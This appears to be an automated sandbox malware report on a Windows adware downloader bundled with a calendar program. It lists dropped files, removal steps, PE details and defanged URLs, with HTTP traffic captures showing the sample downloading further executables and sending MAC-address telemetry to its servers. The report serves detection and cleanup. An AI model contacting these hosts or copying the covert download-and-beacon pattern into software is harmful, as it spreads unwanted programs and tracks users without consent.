    %Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
    %Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
    %Program Files%\fhrl\Skin\test\½Ìʦ½Ú.png (545 bytes)
    %Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\ÆßϦ½Ú.png (930 bytes)
    %Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
    %Program Files%\fhrl\FMTest.exe (14713 bytes)
    %Program Files%\fhrl\huangli.xml (6456 bytes)
    %Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
    %Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
    %Program Files%\fhrl\Skin\test\input.png (3 bytes)
    %Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
    %Program Files%\fhrl\Update.exe (17508 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
    %Program Files%\fhrl\KillProc.exe (4255 bytes)
    %Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
    %Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
    %Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
    %Program Files%\fhrl\Skin\test\¼Ù.png (1 bytes)
    %Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
    %Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
    %Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\·çºÍÈÕÀú.lnk (686 bytes)
    %Program Files%\fhrl\uninst.exe (738 bytes)
    %Program Files%\fhrl\Skin\test\ÖÐÇï½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
    %Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
    %Program Files%\fhrl\FMDLL32.dll (14324 bytes)
    %Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
    %Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\³ýϦ.png (1 bytes)
    %Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
    %Program Files%\fhrl\Skin\warn.wav (314 bytes)
    %Program Files%\fhrl\subdivis.db (4 bytes)
    %Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
    %Program Files%\fhrl\Update\version.ini (72 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
    %Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
    %Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
    %Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Ôªµ©.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
    %Program Files%\fhrl\FhCalendar.exe (19232 bytes)
    %Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
    %Program Files%\fhrl\Skin\test\Ê¥µ®½Ú.png (873 bytes)
    %Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
    %Program Files%\fhrl\Skin\test\index.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
    %Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
    %Program Files%\fhrl\Skin\test\¸Ð¶÷½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\¹í½Ú.png (913 bytes)
    %Program Files%\fhrl\Skin\test\¼ÙÑ¡ÖÐ.PNG (3 bytes)
    %Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
    %Program Files%\fhrl\Skin\test\tip.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
    %Program Files%\fhrl\FMDLL.dll (14673 bytes)
    %Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
    %Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
    %Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\·çºÍÈÕÀú.lnk (692 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
    %Program Files%\fhrl\Skin\test\´º½Ú.png (1 bytes)
    %Documents and Settings%\All Users\Desktop\·çºÍÈÕÀú.lnk (674 bytes)
    %Program Files%\fhrl\Skin\test\dian.png (290 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÖØÑô½Ú.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
    %Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
    %Program Files%\fhrl\Skin\test\¶ËÎç½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
    %Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\logo.png (4 bytes)
    %Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
    %Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\ÇåÃ÷½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\¸¾Å®½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\¸¸Ç×½Ú.png (846 bytes)
    %Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
    %Program Files%\fhrl\Skin\test\¶ùͯ½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
    %Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
    %Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
    %Program Files%\fhrl\Skin\test\ÓÞÈ˽Ú.png (991 bytes)
    %Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
    %Program Files%\fhrl\Skin\test\°àÑ¡ÖÐ.PNG (3 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\·çºÍÈÕÀú.lnk (686 bytes)
    %Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
    %Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
    %Program Files%\fhrl\Skin\test\ĬÈÏ.png (1 bytes)
    %Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\Default\line.png (2 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
    %Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
    %Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
    %Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÔªÏü½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
    %Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ƽ°²Ò¹.png (1 bytes)
    %Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
    %Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
    %Program Files%\fhrl\Skin\test\ĬÈÏÑ¡ÖÐ.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
    %Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
    %Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥³£Ì¬.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
    %Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\жÔØ·çºÍÈÕÀú.lnk (691 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
    %Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
    %Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
    %Program Files%\fhrl\Skin\test\ĸÇ×½Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
    %Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
    %Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
    %Program Files%\fhrl\Skin\test\°à.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ÇéÈ˽Ú.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
    %Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
    %Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\¹â¹÷½Ú.png (536 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
    %Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
    %Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
    %Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
    %Program Files%\xxss.ini (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
    %Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sport.yuejan[1].txt (214 bytes)
    C:\fhsli_6_12001.exe (1616 bytes)
    C:\114gglm_016.exe (1664 bytes)
    C:\xxdd_165.exe (30622 bytes)
    %Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
    %Program Files%\fhrl\info.db (120 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjime" = "%Program Files%\Wuji\Wuji.exe auto"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ??????????(http://www.eyuyan.com)Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40964259842017285.54424d0ef0aaee25bba1be37747cce181dfcf
.rdata43008069632179205.501972c2e8d17d10be6f7aa7ca9f9876e0a99
.data499712176128179205.517434b67851f67928e82417856798afacf3a
.rsrc6758407905282462725.53726981a356a8a9ce2514af7897a72a377f8
.aspack14663681228897283.47169263888398d77ec23c33d8b15fd5d106b
.adata1478656409600d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://software.fhrlw.cn/slience/fhsli_6_12001.exe61.147.103.147
hxxp://software.fhrlw.cn/oemini/info.ini?id=4161.147.103.147
hxxp://s-99273.abc188.com/xxdd_165.exe
hxxp://software.fhrlw.cn/fhrl/fhrl_0613.exe61.147.103.147
hxxp://dl2.fhrlw.com/fhrl/fhrl_0613.exe125.211.211.8
hxxp://software.fhrlw.cn/api/GetConfig.ashx61.147.103.147
hxxp://software.fhrlw.cn/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=061.147.103.147
hxxp://software.fhrlw.cn/Update/version.txt?4591999261.147.103.147
hxxp://software.fhrlw.cn/Api/GetHoliday.ashx61.147.103.147
hxxp://software.fhrlw.cn/Api/GetWeather.ashx?province=??&city=??61.147.103.147
hxxp://software.fhrlw.cn/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=061.147.103.147
hxxp://software.fhrlw.cn/ad/fixad.html?id=999561.147.103.147
hxxp://software.fhrlw.cn/js/jquery-1.3.2.min.js61.147.103.147
hxxp://software.fhrlw.cn/client/picchange.css61.147.103.147
hxxp://fusa.a.sohu.com/cs/jsfile/js/c.js
hxxp://proxy.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid=
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://proxy.sogou.com/qi
hxxp://njsh.cdn.sogou.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif
hxxp://njsh.cdn.sogou.com/testgpimg/sogou_icon_short.png
hxxp://acookie.split.taobao.com/cms.gif?id=40490128&extendata=
hxxp://proxy.sogou.com/pixel?tid=E0&ver=1&extendata=
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://software.fhrlw.cn//js/picchange.js61.147.103.147
hxxp://njsh.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg
hxxp://njsh.cdn.sogou.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif
hxxp://images.sohu.com/cs/jsfile/js/c.js66.102.246.139
hxxp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata=106.120.151.61
hxxp://dl1.fhrlw.com/fhrl/fhrl_0613.exe61.147.103.147
hxxp://img.fhrlw.com/client/picchange.css61.147.103.147
hxxp://img.fhrlw.com//js/picchange.js61.147.103.147
hxxp://acookie.tanx.com/cms.gif?id=40490128&extendata=110.75.69.67
hxxp://client.fhrlw.com/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=061.147.103.147
hxxp://update.fhrlw.com/Update/version.txt?4591999261.147.103.147
hxxp://img.fhrlw.com/js/jquery-1.3.2.min.js61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-220.181.124.6
hxxp://img04.sogoucdn.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif58.215.147.38
hxxp://client.fhrlw.com/api/GetConfig.ashx61.147.103.147
hxxp://client.fhrlw.com/Api/GetWeather.ashx?province=??&city=??61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-220.181.124.6
hxxp://client.fhrlw.com/Api/GetHoliday.ashx61.147.103.147
hxxp://ddl.9yfc.com/xxdd_165.exe211.149.191.150
hxxp://inte.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid=220.181.124.6
hxxp://p.inte.sogou.com/testgpimg/sogou_icon_short.png222.211.87.185
hxxp://client.fhrlw.com/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=061.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-220.181.124.6
hxxp://imgstore04.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg1.115.192.23
hxxp://img04.sogoucdn.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif58.215.147.38
hxxp://client.fhrlw.com/ad/fixad.html?id=999561.147.103.147
hxxp://dspcm.brand.sogou.com/qi106.120.151.61

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /js/jquery-1.3.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.fhrlw.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 57272

Content-Type: application/x-javascript

Last-Modified: Fri, 06 Sep 2013 02:48:44 GMT

Accept-Ranges: bytes

ETag: "5bc4399aabaace1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:24 GMT

/*.. * jQuery JavaScript Library v1.3.2.. * hXXp://jquery.com/.. *.. * Copyright (c) 2009 John Resig.. * Dual licensed under the MIT and GPL licenses... * hXXp://docs.jquery.com/License.. *.. * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009).. * Revision: 6246.. */..(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s) >)[^>]*$|^#([\w-] )$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector (this.selector?" ":"") E}else{if(H){G.selector=this.selector "." H "(" E ")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){va

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=614400-819200

Host: dl2.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 614400-819200/2427616

Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT

Accept-Ranges: bytes

ETag: "b50867ae386cf1:4b5"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:03 GMT

>.\${.V....gR.M#.m...=....%..".....y..hg>..Jw...p.1.Zd......I.z1..2K......U..\P.....Q..A..&...zek...{.d.!..k.:..J....jC.?...t...d."...|E..'..j.........=:E.>}0?...2..I..d..._.o^u..-..,)..&.=|...d83.........XY..YZ.,K-...&a.r..Y....@.q ..GE:#JD..nu...x.[.......R.p...$..AV....-J..>..p"0..6.`Qdd..t.z.'#2..O..9.~.L...........X.|.Ock..J..O.[.f...Z.363.q.|..X.)1.....*.SS.'.i.#...7..5P..mp......2tZ/k...e#I...~...(.{..,o2.......Q..`.f.....k1.....S1....:b..^.Fi|......N..=...Li..7.r...Gj....Q..A'#HB.........4.6B...P....S....s..]em........e...a...&..L.....*[.3.?.w.h._.w..$....?7.h......,...n.^.i.3.#)..F...H"t..#...a..$:22...'..........p.a...U[L3...Q9.B.K.......?..........q..\.I.D9<Poz.&k%7d...U.A.UFl#....;(a::.-e.X .%.)..7...w.-..b....k:...~.._}T.q#7s}j............._u.j0 s..C.M".h6y.fzGH.I.YAU6F........(Y.qh.. .:.......'.........<_....,~.-8.9Jf?.,... ..2..".L....G.|.f....,..F..boQ....9....C..\T..t..}..mOHt...fI...X.Z.I..R7D.L.,.b.@.*.p.A..t..7..>.3..;.....@..IMT.}*...j,.\N.w...E.IOZ.../.........O.....QYd.1=.M........s[/j.M..1.^..j..s......4.....c.EX.............>&.G....p.;.*t....0..s...C&.j..".9^....7.>..-..x >.............~/....<.<;...9%,...j=..-.....NHzZ..Ba.......*.=...Cv.,u....P|c....J...><.jy!..Jw.7.......4.*.3.d!U!..^i.8/.A...Blp..c........-~.B..W...7. tS9.})k.@>...s'..'c.....SEW=b[-5...0Y...mbr...(.m...~.._......t.'...%....j.~(e..N"..3/e......,..........l.s...EwK.,........`^..<n..W...._....?...3..!8.S.l."D....BoB`R}Z.....B..,..`i......F..B.....x..MQn...>...C3...;.[Y`

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1433600-1638400

Host: dl2.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

